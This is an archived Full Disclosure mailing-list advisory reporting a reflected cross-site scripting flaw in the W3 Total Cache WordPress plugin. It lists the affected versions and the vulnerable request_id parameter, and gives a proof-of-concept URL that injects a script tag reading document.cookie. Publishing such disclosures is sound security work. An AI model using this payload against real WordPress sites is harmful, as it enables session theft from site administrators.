lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <CA+fhm97J=Hk=fDN2PR7PxnMpeXfOeKczPsMnpXy0RzcTJr-tng@mail.gmail.com>
Date: Wed, 21 Sep 2016 08:56:48 -0300
From: "Fernando A. Lagos Berardi" <fernando@...ial.org>
To: fulldisclosure@...lists.org
Subject: [FD] XSS Wordpress W3 Total Cache <= 0.9.4.1

[+] Description: Cross-Site Scripting vulnerability was found on Wordpress
W3 Total Cache (w3tc) plugin.
[+] Plugin Version tested: <= 0.9.4.1 (latest)
[+] Wordpress version tested: 4.0.0 - 4.6.1 (latest)

------------------------------

[+] Component: W3 Total Cache Admin (performance menu) -> Support -> Add
new ticket
[+] Variable: request_id
[+] Method: GET

-------------------------------

[+] Affected URL:
https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http://example.org&name=test&email=test%40gmail.com&twitter&phone&subject=test&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=XSS_PAYLOAD_HERE

---------------------------------

[+] POC:
https://labs.nivel4.net/wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http://example.org&name=test&email=test%40gmail.com&twitter&phone&subject=test&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=11111666
"><script>alert(document.cookie)<%2Fscript>


[+] More info:
https://blog.zerial.org/seguridad/vulnerabilidad-cross-site-scripting-en-wordpress-w3-total-cache/


-- 
Fernando A. Lagos Berardi - Zerial
Seguridad Informatica
Linux User #382319
Blog: https://blog.zerial.org <http://blog.zerial.org>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ